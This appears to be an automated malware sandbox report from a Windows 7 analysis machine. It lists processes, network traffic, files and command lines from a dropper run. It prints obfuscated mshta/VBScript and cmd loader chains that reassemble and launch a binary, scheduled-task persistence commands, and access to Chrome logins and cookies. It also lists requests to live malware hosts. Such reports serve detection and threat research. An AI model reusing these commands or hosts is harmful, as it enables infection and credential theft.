Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Oct. 7, 2021, 4:39 p.m. | Oct. 7, 2021, 4:41 p.m. |
-
-
-
6aOsph8Vk68scxMNFvQ7Uzqb.exe "C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe"
2644 -
WiYqA2zBXVHeg1hqJ12GluSw.exe "C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe"
2080 -
ZDJ2UKOjrj_0bfm6hPadSwx2.exe "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
1908-
ZDJ2UKOjrj_0bfm6hPadSwx2.exe "C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe"
656
-
-
L_0PQ1nH1s1hf_DH8W5V8AUl.exe "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
2744-
mshta.exe "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))
2112-
cmd.exe "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw"
3016-
-
mshta.exe "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE ))
2212-
cmd.exe "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw"
1408
-
-
mshta.exe "C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) )
2324-
cmd.exe "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q *
2532-
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" EChO "
1332 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN"
2804 -
-
-
-
rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 ..\QVNGP.I
3712
-
-
-
-
-
-
-
taskkill.exe taskkill /f -Im "L_0PQ1nH1s1hf_DH8W5V8AUl.exe"
1040
-
-
-
-
dfjGrIRplh8E6xLCwTkR51co.exe "C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe"
1808 -
moAvWFpOQZD1e8sxHLAKrthe.exe "C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe" /mixtwo
668 -
CsOtXVBhUjDrvtRgizng8F7v.exe "C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe" silent
2344 -
xmi8r9WNNrVSGcFZGMShRqy0.exe "C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe"
1204-
-
taskkill.exe taskkill /f /im chrome.exe
3908
-
-
-
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\test22\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=65.0.3325.181 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fef2f6f1e8,0x7fef2f6f1f8,0x7fef2f6f208
3276 -
chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=3100 --on-initialized-event-handle=316 --parent-handle=320 /prefetch:6
3408
-
-
-
pImS5RWnyPoH71MUnlZxfr7l.exe "C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe"
3472-
pImS5RWnyPoH71MUnlZxfr7l.tmp "C:\Users\test22\AppData\Local\Temp\is-3QENA.tmp\pImS5RWnyPoH71MUnlZxfr7l.tmp" /SL5="$A022E,3619787,58368,C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe"
3620
-
-
Gul5rTCKpjXo0MogByz6Rjtk.exe "C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe"
3124-
Gul5rTCKpjXo0MogByz6Rjtk.tmp "C:\Users\test22\AppData\Local\Temp\is-1PC33.tmp\Gul5rTCKpjXo0MogByz6Rjtk.tmp" /SL5="$100246,506127,422400,C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe"
3308-
-
foldershare.exe "C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe" /VERYSILENT
3736
-
-
-
-
-
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
1976 -
schtasks.exe schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2664
-
-
explorer.exe C:\Windows\Explorer.EXE
1848
IP Address | Status | Action |
---|---|---|
103.155.92.58 | Active | Moloch |
103.155.93.196 | Active | Moloch |
104.244.42.1 | Active | Moloch |
111.90.146.149 | Active | Moloch |
144.202.76.47 | Active | Moloch |
149.154.167.99 | Active | Moloch |
162.0.210.44 | Active | Moloch |
162.0.214.42 | Active | Moloch |
162.159.135.233 | Active | Moloch |
164.124.101.2 | Active | Moloch |
172.67.176.198 | Active | Moloch |
186.2.171.3 | Active | Moloch |
188.225.87.175 | Active | Moloch |
194.145.227.159 | Active | Moloch |
2.56.59.42 | Active | Moloch |
34.117.59.81 | Active | Moloch |
37.0.8.119 | Active | Moloch |
37.140.192.230 | Active | Moloch |
45.133.1.107 | Active | Moloch |
45.133.1.182 | Active | Moloch |
52.216.26.67 | Active | Moloch |
52.95.170.52 | Active | Moloch |
77.88.55.60 | Active | Moloch |
88.99.66.31 | Active | Moloch |
92.61.46.213 | Active | Moloch |
94.142.140.35 | Active | Moloch |
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49204 77.88.55.60:443 |
C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA | C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az | 2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29 |
TLSv1 192.168.56.101:49208 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e |
TLSv1 192.168.56.101:49213 162.159.135.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.101:49223 162.159.135.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.101:49237 162.159.135.233:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da |
TLSv1 192.168.56.101:49250 172.67.176.198:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | f2:26:d9:07:c7:f6:18:ff:8c:b8:6c:92:e9:50:57:e4:a9:94:e5:0d |
TLSv1 192.168.56.101:49225 34.117.59.81:443 |
C=US, O=Google Trust Services LLC, CN=GTS CA 1D4 | CN=ipinfo.io | 9b:8a:7e:73:93:70:47:e8:1f:ef:b1:b9:f4:52:8b:2f:90:2c:85:2e |
TLSv1 192.168.56.101:49241 162.159.135.233:443 |
None | None | None |
TLSv1 192.168.56.101:49280 144.202.76.47:443 |
C=CN, O=TrustAsia Technologies, Inc., OU=Domain Validated SSL, CN=TrustAsia TLS RSA CA | CN=listincode.com | 84:23:95:42:66:09:11:39:0d:e6:22:7f:eb:b3:cc:79:dd:fa:36:ed |
TLSv1 192.168.56.101:49286 88.99.66.31:443 |
C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA | CN=*.iplogger.org | 55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb |
TLSv1 192.168.56.101:49356 52.95.170.52:443 |
C=US, O=Amazon, OU=Server CA 1B, CN=Amazon | CN=*.s3.eu-north-1.amazonaws.com | b3:55:b1:8b:e1:54:cd:a4:5a:94:dc:0f:a1:9a:da:9d:74:3e:22:d7 |
TLSv1 192.168.56.101:49361 162.0.210.44:443 |
C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | C=CH, L=Schaffhausen, O=Plesk, CN=Plesk/emailAddress=info@plesk.com | 68:49:fa:d2:40:0d:bd:3f:c0:6e:bf:50:6f:a8:1c:a3:3e:f4:40:cf |
TLSv1 192.168.56.101:49363 88.99.66.31:443 |
C=US, O=Let's Encrypt, CN=R3 | CN=iplogger.com | 01:03:e9:82:3a:f4:6d:5a:7f:e9:29:26:08:3c:f4:61:a7:b2:88:bb |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
file | C:\Program Files (x86)\Google\Chrome\Application\65.0.3325.181\Locales\ko.pak |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome |
suspicious_features | Connection to IP address | suspicious_request | GET http://45.133.1.182/proxies.txt | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://37.0.8.119/service/communication.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://37.0.8.119/base/api/statistics.php | ||||||
suspicious_features | POST method with no referer header, Connection to IP address | suspicious_request | POST http://37.0.8.119/base/api/getData.php | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://45.133.1.107/download/NiceProcessX64.bmp | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://45.133.1.107/download/NiceProcessX64.bmp | ||||||
suspicious_features | Connection to IP address | suspicious_request | HEAD http://194.145.227.159/pub.php?pub=two | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://194.145.227.159/pub.php?pub=two | ||||||
suspicious_features | Connection to IP address | suspicious_request | GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v | ||||||
suspicious_features | POST method with no referer header | suspicious_request | POST http://www.cjnovone.top/Home/Index/lkdinl | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://safialinks.com/Widgets/FolderShare.exe | ||||||
suspicious_features | GET method with no useragent header | suspicious_request | GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe | ||||||
suspicious_features | POST method with no referer header, POST method with no useragent header | suspicious_request | POST https://connectini.net/Series/SuperNitou.php |
request | GET http://45.133.1.182/proxies.txt |
request | POST http://37.0.8.119/service/communication.php |
request | GET http://37.0.8.119/base/api/statistics.php |
request | POST http://37.0.8.119/base/api/getData.php |
request | HEAD http://45.133.1.107/download/NiceProcessX64.bmp |
request | GET http://45.133.1.107/download/NiceProcessX64.bmp |
request | HEAD http://194.145.227.159/pub.php?pub=two |
request | HEAD http://threesmallhills.com/pub3.exe |
request | HEAD http://www.nqhobby.com/askhelp58/askinstall58.exe |
request | HEAD http://ukcom.pw/adsli/md7_7dfj.exe |
request | HEAD http://install-cb.ru/CalcCryptoInstalww.exe |
request | GET http://threesmallhills.com/pub3.exe |
request | GET http://ukcom.pw/adsli/md7_7dfj.exe |
request | GET http://194.145.227.159/pub.php?pub=two |
request | HEAD http://www.nqhobby.com/askinstall58.exe |
request | GET http://install-cb.ru/CalcCryptoInstalww.exe |
request | GET http://www.nqhobby.com/askhelp58/askinstall58.exe |
request | GET http://www.nqhobby.com/askinstall58.exe |
request | GET http://186.2.171.3/seemorebty/il.php?e=CsOtXVBhUjDrvtRgizng8F7v |
request | GET http://www.iyiqian.com/ |
request | POST http://www.cjnovone.top/Home/Index/lkdinl |
request | HEAD http://safialinks.com/Installer_Provider/ShareFolder.exe |
request | GET http://safialinks.com/Installer_Provider/ShareFolder.exe |
request | GET http://apps.identrust.com/roots/dstrootcax3.p7c |
request | GET http://safialinks.com/Widgets/FolderShare.exe |
request | GET http://safialinks.com/xJRtjaHLw25uhP75sj4j5SDQa3dAyG/BestCPM/Soft_Manager_Cpm.exe |
request | GET https://yandex.ru/ |
request | GET https://ipinfo.io/widget |
request | GET https://cdn.discordapp.com/attachments/882087629896691744/894083102190764052/Cube_WW14.bmp |
request | GET https://cdn.discordapp.com/attachments/891021838312931420/895238855698051082/PL_Client.bmp |
request | GET https://cdn.discordapp.com/attachments/882087629896691744/890166075864543242/installer_2021-09-21_16-31.bmp |
request | GET https://cdn.discordapp.com/attachments/882087629896691744/890166081547825162/LivelyScreenRecLy2109.bmp |
request | GET https://dc-repository.com/sfx_123_207.exe |
request | GET https://www.listincode.com/ |
request | GET https://iplogger.org/14Jup7 |
request | GET https://publishersharef.s3.eu-north-1.amazonaws.com/Sharefolder.exe |
request | POST https://connectini.net/Series/SuperNitou.php |
request | POST http://37.0.8.119/service/communication.php |
request | POST http://37.0.8.119/base/api/getData.php |
request | POST http://www.cjnovone.top/Home/Index/lkdinl |
request | POST https://connectini.net/Series/SuperNitou.php |
description | u7bmZ_Jch5QWYEh3mRgkn8v4.exe tried to sleep 225 seconds, actually delayed analysis time by 225 seconds |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\icon.png |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Login Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Csd Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing IP Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Bloom |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Module Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\ChromeFilenameClientIncident.store |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Side-Effect Free Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List Prefix Set |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Inclusion Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Local State |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Stability\3104-1633592404530000.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-active.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Extension Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics-spare.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Resource Blacklist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\metadata |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-615EB71C-C20.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\First Run |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download Whitelist |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Download |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\index |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\reports\4532e9ed-376c-41b6-8ead-bdd325a6cfae.dmp |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\background.html |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing UwS List |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Profile 1\Cookies |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-5F2CDF32-998.pma |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_0 |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\GPUCache\data_1 |
domain | ipinfo.io |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\content.js |
file | C:\Users\test22\Pictures\Adobe Films\dfjGrIRplh8E6xLCwTkR51co.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\pad-nopadding.js |
file | C:\Users\test22\Documents\5mtQoaCdFoT9WiAeXXqhQNJK.dll |
file | C:\Users\test22\Documents\u7bmZ_Jch5QWYEh3mRgkn8v4.exe |
file | C:\Users\test22\Pictures\Adobe Films\pImS5RWnyPoH71MUnlZxfr7l.exe |
file | C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe |
file | C:\Users\test22\Pictures\Adobe Films\6aOsph8Vk68scxMNFvQ7Uzqb.exe |
file | C:\Program Files\Windows NT\EBPCICFIYY\foldershare.exe |
file | C:\Users\test22\Pictures\Adobe Films\WiYqA2zBXVHeg1hqJ12GluSw.exe |
file | C:\Users\test22\Pictures\Adobe Films\Gul5rTCKpjXo0MogByz6Rjtk.exe |
file | C:\Users\test22\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\_isetup\_shfoldr.dll |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\jquery-3.3.1.min.js |
file | C:\Users\test22\Pictures\Adobe Films\ZDJ2UKOjrj_0bfm6hPadSwx2.exe |
file | C:\Users\test22\Pictures\Adobe Films\moAvWFpOQZD1e8sxHLAKrthe.exe |
file | C:\Users\test22\AppData\Local\Temp\25-c4647-5ce-46289-077b3ce9ed0d6\Nygaefoqypu.exe |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\Adam.exe |
file | C:\Users\test22\AppData\Local\Temp\is-ADCTA.tmp\idp.dll |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\aes.js |
file | C:\Users\test22\Pictures\Adobe Films\CsOtXVBhUjDrvtRgizng8F7v.exe |
file | C:\Users\test22\Pictures\Adobe Films\xmi8r9WNNrVSGcFZGMShRqy0.exe |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\mode-ecb.js |
file | C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\js\background.js |
cmdline | MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF """"=="""" for %w iN ( ""C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE )) |
cmdline | MSHtA.eXE vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE )) |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" EChO " |
cmdline | "C:\Windows\System32\cmd.exe" /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q * |
cmdline | schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST |
cmdline | C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw" |
cmdline | "C:\Windows\System32\mshta.exe" vbSCrIPt:CLOsE( cReaTeoBJeCt ( "wSCRipt.SHElL" ).Run( "C:\Windows\system32\cmd.exe /C coPy /Y ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""-pSEIMItxZzhTvqGZd ""=="""" for %w iN ( ""C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE"" ) do taskkill /f -Im ""%~nXw"" ", 0,TrUE )) |
cmdline | C:\Windows\system32\cmd.exe /S /D /c" Set /p = "MZ" 1>XAJ5SctM.IMN" |
cmdline | C:\Windows\System32\cmd.exe /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw" |
cmdline | Cmd.exe /C EChO | Set /p = "MZ" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX+ KPeo.Pvp + _OTV19C.~ +EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I&StArT control.exe ..\QVNGP.I &del /Q * |
cmdline | "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF "-pSEIMItxZzhTvqGZd "=="" for %w iN ( "C:\Users\test22\AppData\Local\Temp\XFLr_FTQ.eXE" ) do taskkill /f -Im "%~nXw" |
cmdline | "C:\Windows\system32\cmd.exe" /C coPy /Y "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ..\XFLr_FTQ.eXE && StARt ..\xFLR_FTQ.exe -pSEIMItxZzhTvqGZd & IF ""=="" for %w iN ( "C:\Users\test22\Pictures\Adobe Films\L_0PQ1nH1s1hf_DH8W5V8AUl.exe" ) do taskkill /f -Im "%~nXw" |
cmdline | MSHTa.Exe vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) ) |
cmdline | "C:\Windows\System32\mshta.exe" vbsCRipT:cLose ( cReaTEoBjECT ("WSCriPt.SHELl" ).RuN("Cmd.exe /C EChO | Set /p = ""MZ"" > XAJ5SctM.IMN © /b /y xAJ5sCtM.IMN +E1N4OJ2.AUX + KPeo.Pvp + _OTV19C.~ + EcF9W5.VNQ + pM9uZ.pF + KO6PQ1.bHw ..\QVNGp.I& StArT control.exe ..\QVNGP.I & del /Q * " , 0, true ) ) |
